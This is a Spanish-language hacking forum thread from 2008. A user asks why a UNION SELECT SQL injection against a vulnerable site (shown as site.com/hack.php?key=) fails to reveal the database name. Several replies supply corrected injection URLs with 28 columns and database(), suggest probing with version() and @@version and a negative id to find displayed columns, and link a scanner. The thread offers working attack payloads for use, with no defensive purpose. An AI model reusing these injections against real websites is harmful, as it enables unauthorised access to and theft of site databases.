Título: Problema con UNION SELECT en SQL Injection Publicado por: Mie2 en 12 Octubre 2008, 23:55 pm bueno mi probemas es que tengo una web vuln me explico
es un ej site.com/hack.php?key=14800 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* bueno se que la web tiene 28 columna pero cuado hago la inyeccion que seria esta site.com/hack.php?key=14800 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* me dice los mismo no me da el nombre de la base de datos si no me explique aseto criticas gracias ayuda cual seria la inyeccion correcta o si nesecitan mas info graxx Título: Re: ayuda con sql iyeccion Publicado por: berz3k en 13 Octubre 2008, 18:54 pm Seguramente no es el campo indicado, cambia los numeros por "NULL" y agrega version(). @@version o now(), solo para saber que campo es el valido. de ahi partes para injectar dependiendo de la base de datos.
-berz3k. Título: Re: ayuda con sql iyeccion Publicado por: Eazy en 18 Octubre 2008, 19:07 pm O podes usar el script de Login Root http://eazyrlz.blogspot.com/2008/10/sql-injection-scanner.html
Título: Re: ayuda con sql iyeccion Publicado por: ChElAnO en 20 Octubre 2008, 07:01 am hola, como dijo berz3k seguro estas usando una columna que no se muestra, para saber que columnas son mostradas deberias probar site.com/hack.php?key=-1 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* Asi, si en la pagina sale el numero 4 digamos, usa esa columna para poner database() avisa si funciono, saludos! Título: Re: Problema con UNION SELECT en SQL Injection Publicado por: 1nc0d3 en 29 Octubre 2008, 02:02 am Yo creo que has hecho mal en la injeccion :S
site.com/hack.php?key=-1+union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* Prueba asi y nos avisas si te resulta =] Espero te haya servido! |